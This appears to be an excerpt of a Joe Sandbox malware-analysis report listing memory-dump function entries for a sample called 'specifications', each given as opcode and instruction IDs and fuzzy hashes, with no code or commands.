                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                                  • Instruction ID: 6b11736d27a97694b13b5029f0bc0afbfdfb4a0d249ec4ee99997bd412ebb72d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 56010471A05721DBCB618F1D9840A7E7BE4EB55B70708896DF8D58B281D331D802CB74
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 6835f2529a4c34c0467de41985fcd98d6d7a4637d9501a97852867020dbf5f70
                                                                                                                                                                                  • Instruction ID: d327e00aa165beecafd6c0a8bc52a43b7793f5e3bd72dbed3ed753e06ac408a4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6835f2529a4c34c0467de41985fcd98d6d7a4637d9501a97852867020dbf5f70
                                                                                                                                                                                  • Instruction Fuzzy Hash: B3010472441501DBC76ADF1C8801E52B7B8EB99370B154225EDB89B596F730D881CBC0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7896f104859713cd3b7652b90a9fdf44c392a438cd1a04c999f294c1e1c72182
                                                                                                                                                                                  • Instruction ID: 47e41d4cf1c910a42447863aab19846b95f73e71eae076778efe46a8a2c3265d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7896f104859713cd3b7652b90a9fdf44c392a438cd1a04c999f294c1e1c72182
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1811E135241641EFDB15EF19CC81F4A7BB8FF54B44F2000A8FA459B661C331ED00CA90
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4b269e202d3758574c6d84d794a81783832a8ca9551c8acae8dc9149e2c486af
                                                                                                                                                                                  • Instruction ID: fe409d147eb3e237626b57a370f8f05d4cd8e897dda0b125bd0c2163d26355ae
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b269e202d3758574c6d84d794a81783832a8ca9551c8acae8dc9149e2c486af
                                                                                                                                                                                  • Instruction Fuzzy Hash: A311A070505229ABEB65EB64CC42FEC73B4BF04710F5041D8B398A60E0DB709E81CF84
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ab1e3ed3b0d151832645c6868c1f196d39b2623df077d632e4ac6154e4b02672
                                                                                                                                                                                  • Instruction ID: 00200a70fae21256590b59542529b2dcdf276d720718f179b9fc9fd87843dfab
                                                                                                                                                                                  • Opcode Fuzzy Hash: ab1e3ed3b0d151832645c6868c1f196d39b2623df077d632e4ac6154e4b02672
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F11177290011DABCB16DB94CC80DEFBB7CEF48354F044166A906A7211EA34AA55CBA0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                                  • Instruction ID: b0d637c97cbf00e3deab650177bf6cf2b9c9f39116d9d68513d9a524c469e86c
                                                                                                                                                                                  • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 110124326042118BEF55AA6DD880B9677A7BFC4700F5981E5FDC28F247EA71CC82CB90
Memory Dump Source
• Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b489b767a0c81945ea88ea5919caaddf485454712ca200fd5cc2a5da9486760d
                                                                                                                                                                                  • Instruction ID: 4018816d56bffc1f65a2fd1ed4f319eeee152f61f6beb1d2dd8608ed7faf9b51
                                                                                                                                                                                  • Opcode Fuzzy Hash: b489b767a0c81945ea88ea5919caaddf485454712ca200fd5cc2a5da9486760d
                                                                                                                                                                                  • Instruction Fuzzy Hash: F61104326001469FD709CF19D800BA6FBB9FB5A344F098169E848CB319D772EC80CBA0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: beaad6be677bd51a4385fad195eb02c4806f9f2e73c57670a44029a8c366497f
                                                                                                                                                                                  • Instruction ID: 84ca0049c96b1e13882dd17f92dc5b6edcf55c300622b072820f90f3f68eba86
                                                                                                                                                                                  • Opcode Fuzzy Hash: beaad6be677bd51a4385fad195eb02c4806f9f2e73c57670a44029a8c366497f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D111CB1E002099BCB04DFA9D591A9EB7F4FF58250F10806AB905E7351D674EA018FA4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ec995844332de9275423ed45e571ca9ddb738dd7f95afa5f2286399b1a2e16cd
                                                                                                                                                                                  • Instruction ID: 59e9649fc7a855e91296459646f93310fd29fda5f6d6503ebaafc95843a4e097
                                                                                                                                                                                  • Opcode Fuzzy Hash: ec995844332de9275423ed45e571ca9ddb738dd7f95afa5f2286399b1a2e16cd
                                                                                                                                                                                  • Instruction Fuzzy Hash: D001F731142221AFCB3EAF2AC450D7ABBB9FF52660B05842EE1955B211CB31DC51DB91
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                                  • Instruction ID: a42ee0932199e5398d889ddd9975a02a75d7ece1851de9786b9689801e0bc59c
                                                                                                                                                                                  • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A0128321007069FEB63A6ADD900EA777E9FFC5210F444459FAD68B980EA70E501CB90
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 94d056806a92815206b080e019c7ad448e9a7ca23d0c99a1a24be238f46a6127
                                                                                                                                                                                  • Instruction ID: 72e096b61bd5fbc52ccdb8d9f62da3128f766824969ceded8f4fddd930baab6d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 94d056806a92815206b080e019c7ad448e9a7ca23d0c99a1a24be238f46a6127
                                                                                                                                                                                  • Instruction Fuzzy Hash: F4116D35A0120DEBDB05EF64C851BAE7BB5FB94740F00409DEE559B290D735AE11CF90
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 520248560ba1c0a72ae4bfe7faf80638bf3b604b4446e9f962f17619c9ecf955
                                                                                                                                                                                  • Instruction ID: f71df7f5161de4c34f63919c86aac40d663a54b75b4aee66d0f4639287748acd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 520248560ba1c0a72ae4bfe7faf80638bf3b604b4446e9f962f17619c9ecf955
                                                                                                                                                                                  • Instruction Fuzzy Hash: D501F7B1201A457FD711BB79CD80E97B7BCFF546647000529B24983651DB34EC11CAE0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b930850c2080a49dd054345a9ed2dad0a097ccd755b4487eddedfff1e2efec87
                                                                                                                                                                                  • Instruction ID: 0ee72dc1761bb8a1fd687f8129380631f6432978e8387d258667fa4cc0472630
                                                                                                                                                                                  • Opcode Fuzzy Hash: b930850c2080a49dd054345a9ed2dad0a097ccd755b4487eddedfff1e2efec87
                                                                                                                                                                                  • Instruction Fuzzy Hash: 18014033214612DBC328DF79D8849A7FBA8FF44660F11413DE95487190D7319901C7D1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c69cb142c26c349ec7affacfb8f3d2b42de7025548617a178cdb0ed5a2d0a6ca
                                                                                                                                                                                  • Instruction ID: e478aef06545024f7d0d8e5cecb5b27891fc53d4d8b303eeb4c3452ea1c665d5
                                                                                                                                                                                  • Opcode Fuzzy Hash: c69cb142c26c349ec7affacfb8f3d2b42de7025548617a178cdb0ed5a2d0a6ca
                                                                                                                                                                                  • Instruction Fuzzy Hash: 05115771A0120DABDB1AEFA8C854EEE7BB5FB88640F004199BD4197390DB74EA51CF90
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d565fae59eaea6e42a3dbde247424de8bd12005d3edc8eabfd2bb72004aebfa8
                                                                                                                                                                                  • Instruction ID: 52c0fbcdf6e823fae4316a9cdea2b3025cc087c2e12d641af8b6eba507590082
                                                                                                                                                                                  • Opcode Fuzzy Hash: d565fae59eaea6e42a3dbde247424de8bd12005d3edc8eabfd2bb72004aebfa8
                                                                                                                                                                                  • Instruction Fuzzy Hash: C01157B1A183089FC704DF69D441A9BBBE4AF98710F00855EB998DB3A0E630E900CF92
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 31c27950655dde101cf31342ae099fcb57083ad0b013dbc687ef043709d93802
                                                                                                                                                                                  • Instruction ID: 2bfc7e1952771a422166d1db5d27fef68dedeef72e44934164a4adf37392fbdd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 31c27950655dde101cf31342ae099fcb57083ad0b013dbc687ef043709d93802
                                                                                                                                                                                  • Instruction Fuzzy Hash: BE117C716183089FC704DF69D841A8BBBF4FF99750F00865EB998D73A0E670E940CB92
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                                                                                  • Instruction ID: 131fccae121843d29a0897bcab555e28d11d571b2ccd7ffd3fa116baa52304c1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B01D836200605EFD7A99A6DD844F97B7E6FBC5210F044419EA638BA90EB70F880C794
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: bebc0d53472fa2d976089b83a8d7010f687971ea7d37c3b4bf8f8a83a58a0d7c
                                                                                                                                                                                  • Instruction ID: 5f05fc2ce4108e2eb281802160b57ebe81bb1bed3ae9ede7e6dbcd6edd375d3f
                                                                                                                                                                                  • Opcode Fuzzy Hash: bebc0d53472fa2d976089b83a8d7010f687971ea7d37c3b4bf8f8a83a58a0d7c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2FF02472B043825BF3909619EE01B6337DAE7C1755F6980BAEB858B2C1F9B1DC01C398
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ed82f35cdd28581ccc7bf20a4e90f81eafe99ae4b0a8aa9a5b43bc6ffc2524c3
                                                                                                                                                                                  • Instruction ID: beea38ffc680525e5d045f2cc8b74bb31c58cf7210e60c415545b730f2492c6f
                                                                                                                                                                                  • Opcode Fuzzy Hash: ed82f35cdd28581ccc7bf20a4e90f81eafe99ae4b0a8aa9a5b43bc6ffc2524c3
                                                                                                                                                                                  • Instruction Fuzzy Hash: C601F4702016818BF3629B3CCC98FAA37E4FB00B04F4841E4BA91CBAD2E729D4418610
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                                  • Instruction ID: caf5cc4eafb636e3a5c2bc7b32ee7c22f6dba8ea644aec43e60ba3a97fb310ec
                                                                                                                                                                                  • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DF0E931349D3387EB3EAA2FC820B6AA655AF90E00B05052CD652CBA80DF20DC108780
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                                                  • Instruction ID: 20c82ff65cc0f0f0f9dc9fb4328a1a2c12f66bb99b43535c61f2b1e1ca6749e8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                                                  • Instruction Fuzzy Hash: 56F0B432B025519BE72A8A4FCC80F12B768AFD5A60F1A0426A6049B2A0C3A0ED018BD0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 32e86ee828b0ae882fd0b92311c3335224ce8e13d67efeb48bd988698276e410
                                                                                                                                                                                  • Instruction ID: 624e006f7b82d179b3162b52a196bbe316c554ee066906b519965e7ae7358dfe
                                                                                                                                                                                  • Opcode Fuzzy Hash: 32e86ee828b0ae882fd0b92311c3335224ce8e13d67efeb48bd988698276e410
                                                                                                                                                                                  • Instruction Fuzzy Hash: ECF08C716197049FC314EF28C851A5AB7E4FF98710F40865AB898DB390E634EA00CB96
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                                                  • Instruction ID: 4153cd6bfd72f894c7157d5da5454e8061d3fc112956c8872a73c82644ca450b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AF02472600204AFE714DB21CC00F87B6F9EF98300F148079A5C4C7164FAB1DE00C654
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ad10abe2d21eee47232526df538393956b4c1abaad46bd64bbfc04307b3caaee
                                                                                                                                                                                  • Instruction ID: b2f56cf72534fbdaa0d18e475416fa79af4a58fcaf2c12006ce6349bacddd311
                                                                                                                                                                                  • Opcode Fuzzy Hash: ad10abe2d21eee47232526df538393956b4c1abaad46bd64bbfc04307b3caaee
                                                                                                                                                                                  • Instruction Fuzzy Hash: 70F0AF70A012099FCB08EF69C561A9EB7B4FF18300F008169B855EB395EA74EA01CF90
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8e0bcf6d63a5cd6041bf82e0201ce2e806ec428fd8c1ab9eb0303ad607f9a4cb
                                                                                                                                                                                  • Instruction ID: 29996b511fac7f96b21dd5df1f9e8abb048415e864f8ed1bdee311fbbe94430b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e0bcf6d63a5cd6041bf82e0201ce2e806ec428fd8c1ab9eb0303ad607f9a4cb
                                                                                                                                                                                  • Instruction Fuzzy Hash: EEF0F03192A2E7DFE7B2AF1CC004B297BC49B00A28F0948AAD9C9C3602C334D880C600
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 43c1453d9eb815c5558f5037f5d472f1932d9efebb212dadf001569ae0f21235
                                                                                                                                                                                  • Instruction ID: 8e533a4df90899a9f8b094092865570418da4e2d8f9cfcd4d766134a1665a17c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 43c1453d9eb815c5558f5037f5d472f1932d9efebb212dadf001569ae0f21235
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5EF02766419A814BEF3E6B3C78542D16B74A789E14F091455E5B267309C774C8C3C321
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 76851e5fc88fa2da4d46918ece93e8cc0588ac30f33fe9481c4de12213140279
                                                                                                                                                                                  • Instruction ID: 08b30abefa4287b1323a6920e065eba88cadf0e9fedae09db0821db6f850b654
                                                                                                                                                                                  • Opcode Fuzzy Hash: 76851e5fc88fa2da4d46918ece93e8cc0588ac30f33fe9481c4de12213140279
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FF0E2B16116919FF7B2971CC3C8FD17BD49F887A4F08A8A5D8C6C7512C374E880CA54
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                                  • Instruction ID: 76b7b4a3bdec600b486d17adc31fbe9e639678fd8716cfb4ea06fb82d7000f34
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                                  • Instruction Fuzzy Hash: AFD0A932204A64ABDBB2AA2CFC00FC333E8BB88720F060499B048CB051C360AC81CA84
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
